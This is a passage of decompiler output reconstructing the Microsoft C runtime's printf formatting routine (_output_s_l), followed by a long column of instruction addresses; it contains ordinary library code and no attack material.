                            																						E0040D380(_t701 - 0x40);
                            																						_t518 =  *(_t701 - 0x2f0);
                            																						L229:
                            																						return E00416CA0(_t518, _t589,  *(_t701 - 0x48) ^ _t701, _t665, _t699, _t700);
                            																					}
                            																				}
                            																			}
                            																			L219:
                            																			if( *(_t701 - 0x25c) == 0 ||  *(_t701 - 0x25c) == 7) {
                            																				 *(_t701 - 0x334) = 1;
                            																			} else {
                            																				 *(_t701 - 0x334) = 0;
                            																			}
                            																			_t605 =  *(_t701 - 0x334);
                            																			 *(_t701 - 0x2e0) =  *(_t701 - 0x334);
                            																			if( *(_t701 - 0x2e0) == 0) {
                            																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            																				_push(0);
                            																				_push(0x8f5);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				_t523 = L0040E1A0();
                            																				_t704 = _t704 + 0x14;
                            																				if(_t523 == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(_t701 - 0x2e0) != 0) {
                            																				 *(_t701 - 0x300) =  *(_t701 - 0x24c);
                            																				E0040D380(_t701 - 0x40);
                            																				_t518 =  *(_t701 - 0x300);
                            																			} else {
                            																				 *((intOrPtr*)(L0040EC70(_t605))) = 0x16;
                            																				E00411A50(_t589, _t605, _t699, _t700, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            																				 *(_t701 - 0x2fc) = 0xffffffff;
                            																				E0040D380(_t701 - 0x40);
                            																				_t518 =  *(_t701 - 0x2fc);
                            																			}
                            																			goto L229;
                            																		}
                            																		L191:
                            																		if(( *(_t701 - 0x10) & 0x00000040) != 0) {
                            																			if(( *(_t701 - 0x10) & 0x00000100) == 0) {
                            																				if(( *(_t701 - 0x10) & 0x00000001) == 0) {
                            																					if(( *(_t701 - 0x10) & 0x00000002) != 0) {
                            																						 *((char*)(_t701 - 0x14)) = 0x20;
                            																						 *(_t701 - 0x1c) = 1;
                            																					}
                            																				} else {
                            																					 *((char*)(_t701 - 0x14)) = 0x2b;
                            																					 *(_t701 - 0x1c) = 1;
                            																				}
                            																			} else {
                            																				 *((char*)(_t701 - 0x14)) = 0x2d;
                            																				 *(_t701 - 0x1c) = 1;
                            																			}
                            																		}
                            																		 *((intOrPtr*)(_t701 - 0x2c4)) =  *((intOrPtr*)(_t701 - 0x18)) -  *((intOrPtr*)(_t701 - 0x24)) -  *(_t701 - 0x1c);
                            																		if(( *(_t701 - 0x10) & 0x0000000c) == 0) {
                            																			E00422790(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																			_t704 = _t704 + 0x10;
                            																		}
                            																		E004227D0( *(_t701 - 0x1c), _t701 - 0x14,  *(_t701 - 0x1c),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																		_t704 = _t704 + 0x10;
                            																		if(( *(_t701 - 0x10) & 0x00000008) != 0 && ( *(_t701 - 0x10) & 0x00000004) == 0) {
                            																			E00422790(0x30,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																			_t704 = _t704 + 0x10;
                            																		}
                            																		if( *(_t701 - 0xc) == 0 ||  *((intOrPtr*)(_t701 - 0x24)) <= 0) {
                            																			L212:
                            																			E004227D0( *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 0x24)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																			_t704 = _t704 + 0x10;
                            																			goto L213;
                            																		} else {
                            																			L205:
                            																			 *(_t701 - 0x2dc) = 0;
                            																			 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 4));
                            																			 *((intOrPtr*)(_t701 - 0x2cc)) =  *((intOrPtr*)(_t701 - 0x24));
                            																			while(1) {
                            																				L206:
                            																				 *((intOrPtr*)(_t701 - 0x2cc)) =  *((intOrPtr*)(_t701 - 0x2cc)) - 1;
                            																				if( *((intOrPtr*)(_t701 - 0x2cc)) == 0) {
                            																					break;
                            																				}
                            																				L207:
                            																				 *(_t701 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t701 - 0x2c8))));
                            																				_t563 = E004212A0(_t701 - 0x2d0, _t701 - 0x2d8, 6,  *(_t701 - 0x32e) & 0x0000ffff);
                            																				_t704 = _t704 + 0x10;
                            																				 *(_t701 - 0x2dc) = _t563;
                            																				 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 0x2c8)) + 2;
                            																				if( *(_t701 - 0x2dc) != 0 ||  *((intOrPtr*)(_t701 - 0x2d0)) == 0) {
                            																					L209:
                            																					 *(_t701 - 0x24c) = 0xffffffff;
                            																					break;
                            																				} else {
                            																					L210:
                            																					E004227D0( *((intOrPtr*)(_t701 + 8)), _t701 - 0x2d8,  *((intOrPtr*)(_t701 - 0x2d0)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																					_t704 = _t704 + 0x10;
                            																					continue;
                            																				}
                            																			}
                            																			L211:
                            																			L213:
                            																			if( *(_t701 - 0x24c) >= 0 && ( *(_t701 - 0x10) & 0x00000004) != 0) {
                            																				E00422790(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
                            																				_t704 = _t704 + 0x10;
                            																			}
                            																			goto L216;
                            																		}
                            																		L71:
                            																		__ecx =  *((char*)(__ebp - 0x251));
                            																		 *(__ebp - 0x324) = __ecx;
                            																		__edx =  *(__ebp - 0x324);
                            																		__edx =  *(__ebp - 0x324) - 0x41;
                            																		 *(__ebp - 0x324) = __edx;
                            																	} while ( *(__ebp - 0x324) > 0x37);
                            																	_t158 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            																	__ecx =  *_t158 & 0x000000ff;
                            																	switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            																		case 0:
                            																			L123:
                            																			 *(__ebp - 0x2c) = 1;
                            																			__ecx =  *((char*)(__ebp - 0x251));
                            																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            																			 *((char*)(__ebp - 0x251)) = __cl;
                            																			goto L124;
                            																		case 1:
                            																			L73:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																			}
                            																			goto L75;
                            																		case 2:
                            																			L88:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																			}
                            																			goto L90;
                            																		case 3:
                            																			L146:
                            																			 *((intOrPtr*)(__ebp - 0x260)) = 7;
                            																			goto L148;
                            																		case 4:
                            																			L81:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x288) = E0041C290(__ebp + 0x14);
                            																			if( *(__ebp - 0x288) == 0) {
                            																				L83:
                            																				__edx =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __edx;
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				L87:
                            																				goto L190;
                            																			}
                            																			L82:
                            																			__ecx =  *(__ebp - 0x288);
                            																			if( *((intOrPtr*)( *(__ebp - 0x288) + 4)) != 0) {
                            																				L84:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																					 *(__ebp - 0xc) = 0;
                            																					__edx =  *(__ebp - 0x288);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x288);
                            																					__edx =  *__ecx;
                            																					 *(__ebp - 0x24) =  *__ecx;
                            																				} else {
                            																					__edx =  *(__ebp - 0x288);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x288);
                            																					__eax =  *__ecx;
                            																					asm("cdq");
                            																					 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0xc) = 1;
                            																				}
                            																				goto L87;
                            																			}
                            																			goto L83;
                            																		case 5:
                            																			L124:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			__eax = __ebp - 0x248;
                            																			 *(__ebp - 4) = __ebp - 0x248;
                            																			 *(__ebp - 0x44) = 0x200;
                            																			if( *(__ebp - 0x30) >= 0) {
                            																				L126:
                            																				if( *(__ebp - 0x30) != 0) {
                            																					L129:
                            																					if( *(__ebp - 0x30) > 0x200) {
                            																						 *(__ebp - 0x30) = 0x200;
                            																					}
                            																					L131:
                            																					if( *(__ebp - 0x30) > 0xa3) {
                            																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																						if( *(__ebp - 0x20) == 0) {
                            																							 *(__ebp - 0x30) = 0xa3;
                            																						} else {
                            																							__eax =  *(__ebp - 0x20);
                            																							 *(__ebp - 4) =  *(__ebp - 0x20);
                            																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																						}
                            																					}
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					__eax =  *(__ebp + 0x14);
                            																					__ecx =  *(__eax - 8);
                            																					__edx =  *(__eax - 4);
                            																					 *(__ebp - 0x2a8) =  *(__eax - 8);
                            																					 *(__ebp - 0x2a4) =  *(__eax - 4);
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__eax =  *(__ebp - 0x2c);
                            																					_push( *(__ebp - 0x2c));
                            																					__ecx =  *(__ebp - 0x30);
                            																					_push( *(__ebp - 0x30));
                            																					__edx =  *((char*)(__ebp - 0x251));
                            																					_push( *((char*)(__ebp - 0x251)));
                            																					__eax =  *(__ebp - 0x44);
                            																					_push( *(__ebp - 0x44));
                            																					__ecx =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__edx = __ebp - 0x2a8;
                            																					_push(__ebp - 0x2a8);
                            																					__eax =  *0x60b3cc; // 0x7e8c4bdb
                            																					__eax =  *__eax();
                            																					__esp = __esp + 0x1c;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__edx =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																						__eax =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																					__ecx =  *((char*)(__ebp - 0x251));
                            																					if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__eax =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																							E00410200(__ecx) =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__edx =  *(__ebp - 4);
                            																					__eax =  *( *(__ebp - 4));
                            																					if( *( *(__ebp - 4)) == 0x2d) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
                            																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
                            																					}
                            																					__eax =  *(__ebp - 4);
                            																					 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																					goto L190;
                            																				}
                            																				L127:
                            																				__ecx =  *((char*)(__ebp - 0x251));
                            																				if(__ecx != 0x67) {
                            																					goto L129;
                            																				}
                            																				L128:
                            																				 *(__ebp - 0x30) = 1;
                            																				goto L131;
                            																			}
                            																			L125:
                            																			 *(__ebp - 0x30) = 6;
                            																			goto L131;
                            																		case 6:
                            																			L75:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																				__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																				 *(__ebp - 0x284) = __ax;
                            																				__cl =  *(__ebp - 0x284);
                            																				 *(__ebp - 0x248) = __cl;
                            																				 *(__ebp - 0x24) = 1;
                            																			} else {
                            																				 *(__ebp - 0x280) = 0;
                            																				__edx = __ebp + 0x14;
                            																				__eax = E0041C2D0(__ebp + 0x14);
                            																				 *(__ebp - 0x258) = __ax;
                            																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            																				__ecx = __ebp - 0x248;
                            																				__edx = __ebp - 0x24;
                            																				 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            																				if( *(__ebp - 0x280) != 0) {
                            																					 *(__ebp - 0x28) = 1;
                            																				}
                            																			}
                            																			__edx = __ebp - 0x248;
                            																			 *(__ebp - 4) = __ebp - 0x248;
                            																			goto L190;
                            																		case 7:
                            																			goto L0;
                            																		case 8:
                            																			L109:
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 0x298) = E0041C290(__ebp + 0x14);
                            																			if(E00420F80() != 0) {
                            																				L119:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																					__edx =  *(__ebp - 0x298);
                            																					__eax =  *(__ebp - 0x24c);
                            																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																				} else {
                            																					__eax =  *(__ebp - 0x298);
                            																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																				}
                            																				 *(__ebp - 0x28) = 1;
                            																				goto L190;
                            																			}
                            																			L110:
                            																			__edx = 0;
                            																			if(0 == 0) {
                            																				 *(__ebp - 0x32c) = 0;
                            																			} else {
                            																				 *(__ebp - 0x32c) = 1;
                            																			}
                            																			__eax =  *(__ebp - 0x32c);
                            																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            																			if( *(__ebp - 0x29c) == 0) {
                            																				_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																				_push(0);
                            																				_push(0x695);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				__eax = L0040E1A0();
                            																				__esp = __esp + 0x14;
                            																				if(__eax == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(__ebp - 0x29c) != 0) {
                            																				L118:
                            																				goto L190;
                            																			} else {
                            																				L117:
                            																				 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																				__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																				 *(__ebp - 0x2f8) = 0xffffffff;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D380(__ecx);
                            																				__eax =  *(__ebp - 0x2f8);
                            																				goto L229;
                            																			}
                            																		case 9:
                            																			L151:
                            																			 *(__ebp - 8) = 8;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
                            																			}
                            																			goto L153;
                            																		case 0xa:
                            																			L145:
                            																			 *(__ebp - 0x30) = 8;
                            																			goto L146;
                            																		case 0xb:
                            																			L90:
                            																			if( *(__ebp - 0x30) != 0xffffffff) {
                            																				__edx =  *(__ebp - 0x30);
                            																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            																			} else {
                            																				 *(__ebp - 0x328) = 0x7fffffff;
                            																			}
                            																			__eax =  *(__ebp - 0x328);
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																				L101:
                            																				if( *(__ebp - 4) == 0) {
                            																					__edx =  *0x60b4f0; // 0x407424
                            																					 *(__ebp - 4) = __edx;
                            																				}
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x28c) =  *(__ebp - 4);
                            																				while(1) {
                            																					L104:
                            																					__ecx =  *(__ebp - 0x290);
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					if(__ecx == 0) {
                            																						break;
                            																					}
                            																					L105:
                            																					__eax =  *(__ebp - 0x28c);
                            																					__ecx =  *( *(__ebp - 0x28c));
                            																					if(__ecx == 0) {
                            																						break;
                            																					}
                            																					L106:
                            																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																				}
                            																				L107:
                            																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																				 *(__ebp - 0x24) =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																				goto L108;
                            																			} else {
                            																				L94:
                            																				if( *(__ebp - 4) == 0) {
                            																					__eax =  *0x60b4f4; // 0x407414
                            																					 *(__ebp - 4) = __eax;
                            																				}
                            																				 *(__ebp - 0xc) = 1;
                            																				__ecx =  *(__ebp - 4);
                            																				 *(__ebp - 0x294) =  *(__ebp - 4);
                            																				while(1) {
                            																					L97:
                            																					__edx =  *(__ebp - 0x290);
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					if( *(__ebp - 0x290) == 0) {
                            																						break;
                            																					}
                            																					L98:
                            																					__ecx =  *(__ebp - 0x294);
                            																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																						break;
                            																					}
                            																					L99:
                            																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																				}
                            																				L100:
                            																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            																				 *(__ebp - 0x24) = __ecx;
                            																				L108:
                            																				goto L190;
                            																			}
                            																		case 0xc:
                            																			L144:
                            																			 *(__ebp - 8) = 0xa;
                            																			goto L153;
                            																		case 0xd:
                            																			L147:
                            																			 *((intOrPtr*)(__ebp - 0x260)) = 0x27;
                            																			L148:
                            																			 *(__ebp - 8) = 0x10;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				 *((char*)(__ebp - 0x14)) = 0x30;
                            																				 *((intOrPtr*)(__ebp - 0x260)) =  *((intOrPtr*)(__ebp - 0x260)) + 0x51;
                            																				 *((char*)(__ebp - 0x13)) = __al;
                            																				 *(__ebp - 0x1c) = 2;
                            																			}
                            																			goto L153;
                            																		case 0xe:
                            																			goto L190;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            			}



























                            0x00421ff9
                            0x00421ff9
                            0x00421ff9
                            0x00421ff9
                            0x00421ff9
                            0x00421ff9
                            0x00421ff9
                            0x00421fff
                            0x00422002
                            0x00000000
                            0x0042207a
                            0x00000000
                            0x0042207a
                            0x00000000
                            0x0042207a
                            0x0042207a
                            0x00422082
                            0x004220a4
                            0x004220aa
                            0x004220cf
                            0x00422116
                            0x00422119
                            0x0042213a
                            0x0042213f
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211f
                            0x00422124
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d7
                            0x004220f9
                            0x004220fe
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220dd
                            0x004220e2
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220b0
                            0x004220b5
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422088
                            0x0042208d
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422156
                            0x00422198
                            0x0042219e
                            0x004221aa
                            0x00000000
                            0x00422158
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x0042216c
                            0x0042216c
                            0x0042217a
                            0x0042217f
                            0x00422185
                            0x00422193
                            0x004221b0
                            0x004221b8
                            0x004221da
                            0x004221da
                            0x004221e4
                            0x004221f5
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x00422214
                            0x00422216
                            0x00422216
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422241
                            0x00422244
                            0x0042224e
                            0x0042225d
                            0x00422266
                            0x0042227c
                            0x00422282
                            0x0042228f
                            0x0042229d
                            0x0042229d
                            0x004222ac
                            0x004222b4
                            0x004222b4
                            0x004222bc
                            0x004222c2
                            0x004222cb
                            0x004222d7
                            0x004222f0
                            0x004222f6
                            0x004222ff
                            0x004222ff
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x004224fe
                            0x00422501
                            0x00422501
                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x0042194a
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8e
                            0x00421a92
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a35
                            0x00000000
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a04
                            0x00000000
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042251f
                            0x0042251f
                            0x0042251f
                            0x00422535
                            0x0042253b
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
